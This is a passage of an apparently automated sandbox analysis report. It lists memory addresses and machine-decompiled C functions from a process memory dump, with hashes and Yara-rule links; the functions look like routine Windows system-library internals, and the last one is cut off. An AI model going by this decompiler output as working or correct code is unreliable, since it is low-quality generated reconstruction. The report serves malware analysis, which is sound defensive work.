                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c911f
                                                                                                                                                    0x030c911f
                                                                                                                                                    0x030c9125
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c9127
                                                                                                                                                    0x030c912d
                                                                                                                                                    0x030c9130
                                                                                                                                                    0x030c9134
                                                                                                                                                    0x030c9158
                                                                                                                                                    0x030c915d
                                                                                                                                                    0x030c9161
                                                                                                                                                    0x030c9168
                                                                                                                                                    0x03123715
                                                                                                                                                    0x030c916e
                                                                                                                                                    0x030c916e
                                                                                                                                                    0x030c9175
                                                                                                                                                    0x030c9177
                                                                                                                                                    0x030c917e
                                                                                                                                                    0x030c917f
                                                                                                                                                    0x030c9182
                                                                                                                                                    0x030c9182
                                                                                                                                                    0x030c9187
                                                                                                                                                    0x030c9187
                                                                                                                                                    0x030c918a
                                                                                                                                                    0x030c918d
                                                                                                                                                    0x030c918f
                                                                                                                                                    0x030c9192
                                                                                                                                                    0x030c9195
                                                                                                                                                    0x030c9198
                                                                                                                                                    0x030c9198
                                                                                                                                                    0x030c9198
                                                                                                                                                    0x030c919a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312371f
                                                                                                                                                    0x03123721
                                                                                                                                                    0x03123727
                                                                                                                                                    0x0312372f
                                                                                                                                                    0x03123733
                                                                                                                                                    0x03123735
                                                                                                                                                    0x03123738
                                                                                                                                                    0x0312373b
                                                                                                                                                    0x0312373d
                                                                                                                                                    0x03123740
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123746
                                                                                                                                                    0x03123746
                                                                                                                                                    0x03123749
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312374f
                                                                                                                                                    0x0312374f
                                                                                                                                                    0x03123751
                                                                                                                                                    0x03123757
                                                                                                                                                    0x03123759
                                                                                                                                                    0x0312375c
                                                                                                                                                    0x0312375c
                                                                                                                                                    0x0312375e
                                                                                                                                                    0x0312375e
                                                                                                                                                    0x03123761
                                                                                                                                                    0x03123764
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123766
                                                                                                                                                    0x03123768
                                                                                                                                                    0x031237a3
                                                                                                                                                    0x031237a3
                                                                                                                                                    0x031237a5
                                                                                                                                                    0x031237a7
                                                                                                                                                    0x031237ad
                                                                                                                                                    0x031237b0
                                                                                                                                                    0x031237b2
                                                                                                                                                    0x031237bc
                                                                                                                                                    0x031237c2
                                                                                                                                                    0x031237c2
                                                                                                                                                    0x031237b2
                                                                                                                                                    0x030c9187
                                                                                                                                                    0x030c9187
                                                                                                                                                    0x030c918a
                                                                                                                                                    0x030c918d
                                                                                                                                                    0x030c918f
                                                                                                                                                    0x030c9192
                                                                                                                                                    0x030c9195
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c9195
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312376a
                                                                                                                                                    0x0312376a
                                                                                                                                                    0x0312376a
                                                                                                                                                    0x0312376c
                                                                                                                                                    0x0312376c
                                                                                                                                                    0x0312376f
                                                                                                                                                    0x03123775
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123777
                                                                                                                                                    0x03123779
                                                                                                                                                    0x03123782
                                                                                                                                                    0x03123787
                                                                                                                                                    0x03123789
                                                                                                                                                    0x03123790
                                                                                                                                                    0x03123790
                                                                                                                                                    0x0312378b
                                                                                                                                                    0x0312378b
                                                                                                                                                    0x0312378b
                                                                                                                                                    0x03123792
                                                                                                                                                    0x03123795
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123795
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123779
                                                                                                                                                    0x03123798
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123798
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123768
                                                                                                                                                    0x0312379b
                                                                                                                                                    0x0312379b
                                                                                                                                                    0x03123751
                                                                                                                                                    0x03123749
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03123740
                                                                                                                                                    0x030c91a0
                                                                                                                                                    0x030c91a3
                                                                                                                                                    0x030c91a9
                                                                                                                                                    0x030c91b0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c91b0
                                                                                                                                                    0x030c9187
                                                                                                                                                    0x030c91b4
                                                                                                                                                    0x030c91b4
                                                                                                                                                    0x030c91bb
                                                                                                                                                    0x030c91c0
                                                                                                                                                    0x030c91c5
                                                                                                                                                    0x030c91c7
                                                                                                                                                    0x031237da
                                                                                                                                                    0x030c91cd
                                                                                                                                                    0x030c91cd
                                                                                                                                                    0x030c91cd
                                                                                                                                                    0x030c91d2
                                                                                                                                                    0x030c91d5
                                                                                                                                                    0x030c9239
                                                                                                                                                    0x030c9239
                                                                                                                                                    0x030c91d7
                                                                                                                                                    0x030c91db
                                                                                                                                                    0x030c91e1
                                                                                                                                                    0x030c91e7
                                                                                                                                                    0x030c91fd
                                                                                                                                                    0x030c9203
                                                                                                                                                    0x030c921e
                                                                                                                                                    0x030c9223
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c9205
                                                                                                                                                    0x030c9205
                                                                                                                                                    0x030c9208
                                                                                                                                                    0x030c920c
                                                                                                                                                    0x030c9214
                                                                                                                                                    0x030c9214
                                                                                                                                                    0x030c920c
                                                                                                                                                    0x030c91e9
                                                                                                                                                    0x030c91e9
                                                                                                                                                    0x030c91ee
                                                                                                                                                    0x030c91f3
                                                                                                                                                    0x030c91f3
                                                                                                                                                    0x030c91f3
                                                                                                                                                    0x030c91e7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c9134
                                                                                                                                                    0x030c9125
                                                                                                                                                    0x030c911d
                                                                                                                                                    0x030c914e
                                                                                                                                                    0x030c90d1
                                                                                                                                                    0x030c90d1
                                                                                                                                                    0x030c90d3
                                                                                                                                                    0x030c90d6
                                                                                                                                                    0x030c90d8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c90d8
                                                                                                                                                    0x030c90cf

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d531404d5fc0108e3fafcc90ad4972860f8eda70a23ad119d0e8de23f99bcfdd
                                                                                                                                                    • Instruction ID: b2fcf3ba08aa08da243a9470fb979a77eb1167107df7fbedb2e62392147fc040
                                                                                                                                                    • Opcode Fuzzy Hash: d531404d5fc0108e3fafcc90ad4972860f8eda70a23ad119d0e8de23f99bcfdd
                                                                                                                                                    • Instruction Fuzzy Hash: 6601D1726122448FC318DF04D840B19B7F9EB86721F29446AE101DF7A1D370DC81CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0315C450, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                    			E0315C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03109910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E031095B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E031095D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E031095D0();
				return L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                                                                                                    0x0315c458
                                                                                                                                                    0x0315c45d
                                                                                                                                                    0x0315c466
                                                                                                                                                    0x0315c468
                                                                                                                                                    0x0315c469
                                                                                                                                                    0x0315c46a
                                                                                                                                                    0x0315c46b
                                                                                                                                                    0x0315c46e
                                                                                                                                                    0x0315c46f
                                                                                                                                                    0x0315c471
                                                                                                                                                    0x0315c476
                                                                                                                                                    0x0315c476
                                                                                                                                                    0x0315c47c
                                                                                                                                                    0x0315c47e
                                                                                                                                                    0x0315c480
                                                                                                                                                    0x0315c480
                                                                                                                                                    0x0315c483
                                                                                                                                                    0x0315c484
                                                                                                                                                    0x0315c486
                                                                                                                                                    0x0315c488
                                                                                                                                                    0x0315c48f
                                                                                                                                                    0x0315c491
                                                                                                                                                    0x0315c493
                                                                                                                                                    0x0315c493
                                                                                                                                                    0x0315c48f
                                                                                                                                                    0x0315c498
                                                                                                                                                    0x0315c49e
                                                                                                                                                    0x0315c4ad
                                                                                                                                                    0x0315c4ad
                                                                                                                                                    0x0315c4b2
                                                                                                                                                    0x0315c4b4
                                                                                                                                                    0x0315c4cd

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                                                    • Instruction ID: 6573cd86458cb0303936ac1b289d5d00562354d033f4c69185c9be5fc691ad42
                                                                                                                                                    • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                                                                    • Instruction Fuzzy Hash: 3301CC76240605BFD621EF65CC80EA2F76DFB88791F044125F2544A5A0CB22ACA1CAE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03194015, Relevance: .0, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E03194015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E030E2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E030E2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x31b86ac);
					E030CF900(0x31b86d4, _t28);
					E030DFFB0(0x31b86ac, _t28, 0x31b86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E030DFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                                                                                    0x0319401a
                                                                                                                                                    0x0319401e
                                                                                                                                                    0x03194023
                                                                                                                                                    0x03194028
                                                                                                                                                    0x03194029
                                                                                                                                                    0x0319402b
                                                                                                                                                    0x0319402f
                                                                                                                                                    0x03194043
                                                                                                                                                    0x03194046
                                                                                                                                                    0x03194051
                                                                                                                                                    0x03194057
                                                                                                                                                    0x0319405f
                                                                                                                                                    0x03194062
                                                                                                                                                    0x03194067
                                                                                                                                                    0x0319406f
                                                                                                                                                    0x0319407c
                                                                                                                                                    0x0319407c
                                                                                                                                                    0x0319408c
                                                                                                                                                    0x0319408c
                                                                                                                                                    0x03194097

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8b48970cd7ce978b5675188ee843dfb78b1e5b909bbfe9cbe7ec295a37a6e37f
                                                                                                                                                    • Instruction ID: e33a123d68ec54da900cb4b8477d712bc9e20cd78356856d38d3f0ec0db825b7
                                                                                                                                                    • Opcode Fuzzy Hash: 8b48970cd7ce978b5675188ee843dfb78b1e5b909bbfe9cbe7ec295a37a6e37f
                                                                                                                                                    • Instruction Fuzzy Hash: 1D018F76302B497FD615EB69CD80E97F7ACEF89A60B040229F5088BA11DB24EC11C6E4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0318138A, Relevance: .0, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                                    			E0318138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x31bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0310FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E030E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0310B640(E03109AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                                                    0x0318138a
                                                                                                                                                    0x0318138a
                                                                                                                                                    0x03181399
                                                                                                                                                    0x031813a3
                                                                                                                                                    0x031813a8
                                                                                                                                                    0x031813aa
                                                                                                                                                    0x031813b5
                                                                                                                                                    0x031813bb
                                                                                                                                                    0x031813c3
                                                                                                                                                    0x031813c6
                                                                                                                                                    0x031813c9
                                                                                                                                                    0x031813d4
                                                                                                                                                    0x031813e6
                                                                                                                                                    0x031813d6
                                                                                                                                                    0x031813df
                                                                                                                                                    0x031813df
                                                                                                                                                    0x031813f1
                                                                                                                                                    0x031813f2
                                                                                                                                                    0x031813f4
                                                                                                                                                    0x031813f9
                                                                                                                                                    0x0318140e

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 94d571769c5f32f70b5ab131a8c8a2d3c1aee38d990680242b03eef441faf69e
                                                                                                                                                    • Instruction ID: 615c0190ef7541a6d83a2474fd007a5095fe9ae159b849392d8100b14e0b46ee
                                                                                                                                                    • Opcode Fuzzy Hash: 94d571769c5f32f70b5ab131a8c8a2d3c1aee38d990680242b03eef441faf69e
                                                                                                                                                    • Instruction Fuzzy Hash: 07015275A05318AFCB14EFA9D841EAEB7B8EF48710F004066B904EB281DBB4DA41CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031814FB, Relevance: .0, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                                    			E031814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x31bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0310FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E030E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0310B640(E03109AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                                                    0x031814fb
                                                                                                                                                    0x031814fb
                                                                                                                                                    0x0318150a
                                                                                                                                                    0x03181514
                                                                                                                                                    0x03181519
                                                                                                                                                    0x0318151b
                                                                                                                                                    0x03181526
                                                                                                                                                    0x0318152c
                                                                                                                                                    0x03181534
                                                                                                                                                    0x03181537
                                                                                                                                                    0x0318153a
                                                                                                                                                    0x03181545
                                                                                                                                                    0x03181557
                                                                                                                                                    0x03181547
                                                                                                                                                    0x03181550
                                                                                                                                                    0x03181550
                                                                                                                                                    0x03181562
                                                                                                                                                    0x03181563
                                                                                                                                                    0x03181565
                                                                                                                                                    0x0318156a
                                                                                                                                                    0x0318157f

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 666033203d9edc03cc1ed3210648e44e4ea228333214c37c89d82c16c862c59e
                                                                                                                                                    • Instruction ID: 75d9c8b3b70a027863c6031b1163ad9469d68700d4903a78a7afb8d3799a07cc
                                                                                                                                                    • Opcode Fuzzy Hash: 666033203d9edc03cc1ed3210648e44e4ea228333214c37c89d82c16c862c59e
                                                                                                                                                    • Instruction Fuzzy Hash: 00018075A01248AFCB14EFA8D841EAEB7B8EF49700F004066B904EB380DB74DA41CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030C58EC, Relevance: .0, Instructions: 47COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                    			E030C58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x31bd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x30a5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E030C5943() != 0 &&  *0x31b5320 > 5) {
					E03147B5E( &_v44, _t27);
					_t22 =  &_v28;
					E03147B5E( &_v28, _t28);
					_t11 = E03147B9C(0x31b5320, 0x30abf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0310B640(_t11, _t17, _v8 ^ _t29, 0x30abf15, _t27, _t28);
			}















                                                                                                                                                    0x030c58fb
                                                                                                                                                    0x030c58fe
                                                                                                                                                    0x030c5906
                                                                                                                                                    0x030c590a
                                                                                                                                                    0x030c593c
                                                                                                                                                    0x030c593c
                                                                                                                                                    0x030c590c
                                                                                                                                                    0x030c590c
                                                                                                                                                    0x030c5911
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030c5913
                                                                                                                                                    0x030c5913
                                                                                                                                                    0x030c5913
                                                                                                                                                    0x030c5911
                                                                                                                                                    0x030c591d
                                                                                                                                                    0x03121035
                                                                                                                                                    0x0312103c
                                                                                                                                                    0x0312103f
                                                                                                                                                    0x03121056
                                                                                                                                                    0x03121056
                                                                                                                                                    0x030c593b

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 443e52c345f70e28cabe9c2042c2b02049c20e7a64a21abbe3e618c8020cdd1d
                                                                                                                                                    • Instruction ID: d044c06a7374bedc936dfc574a16f77f5157456880a089cf6b549f54b259b2f7
                                                                                                                                                    • Opcode Fuzzy Hash: 443e52c345f70e28cabe9c2042c2b02049c20e7a64a21abbe3e618c8020cdd1d
                                                                                                                                                    • Instruction Fuzzy Hash: 83018479A11648ABC714EF6ADC009AEF7E9EB4A160F5800AD99059B294DF30ED05C660
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030DB02A, Relevance: .0, Instructions: 46COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030DB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E030E7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E03147016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                                                                                    0x030db037
                                                                                                                                                    0x030db039
                                                                                                                                                    0x030db03b
                                                                                                                                                    0x030db040
                                                                                                                                                    0x0312a60e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312a61d
                                                                                                                                                    0x030db04b
                                                                                                                                                    0x030db04e
                                                                                                                                                    0x0312a627
                                                                                                                                                    0x0312a634
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312a641
                                                                                                                                                    0x0312a653
                                                                                                                                                    0x0312a643
                                                                                                                                                    0x0312a64c
                                                                                                                                                    0x0312a64c
                                                                                                                                                    0x0312a65b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312a66c
                                                                                                                                                    0x030db057
                                                                                                                                                    0x030db057
                                                                                                                                                    0x030db057
                                                                                                                                                    0x030db046
                                                                                                                                                    0x030db046
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                                    • Instruction ID: cdb9b9ccbe38588b7432072c90a74484358a88194f8fecc9bcde69d6350cb68c
                                                                                                                                                    • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                                    • Instruction Fuzzy Hash: 0A018431206684DFD326C75CE944F667BECEF45B50F0E00A1F915CB651DB28DC40C620
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03191074, Relevance: .0, Instructions: 46COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E03191074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0319165E(__ebx, 0x31b8ae4, (__edx -  *0x31b8b04 >> 0x14) + (__edx -  *0x31b8b04 >> 0x14), __edi, __ecx, (__edx -  *0x31b8b04 >> 0x14) + (__edx -  *0x31b8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0318AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E030E7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0317FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                                                                                                    0x03191074
                                                                                                                                                    0x03191080
                                                                                                                                                    0x03191082
                                                                                                                                                    0x0319108a
                                                                                                                                                    0x0319108f
                                                                                                                                                    0x03191093
                                                                                                                                                    0x031910ab
                                                                                                                                                    0x031910ab
                                                                                                                                                    0x031910c3
                                                                                                                                                    0x031910cf
                                                                                                                                                    0x031910e1
                                                                                                                                                    0x031910d1
                                                                                                                                                    0x031910da
                                                                                                                                                    0x031910da
                                                                                                                                                    0x031910e9
                                                                                                                                                    0x031910f5
                                                                                                                                                    0x031910f5
                                                                                                                                                    0x031910fe

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fa023383199798d1366d7f5c28a75ae9a53f7ef314119d7a11b2b93245b22eaa
                                                                                                                                                    • Instruction ID: 72e41b2dc14a6d5b406d19c8f50eb34ced51a29b6d02088034a52f4a36202b10
                                                                                                                                                    • Opcode Fuzzy Hash: fa023383199798d1366d7f5c28a75ae9a53f7ef314119d7a11b2b93245b22eaa
                                                                                                                                                    • Instruction Fuzzy Hash: 18012876504746AFDB14EF69C900B1AB7E9AF88210F09852AF89587290EF31D491CB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0317FE3F, Relevance: .0, Instructions: 46COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                    			E0317FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x31bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0310FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E030E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
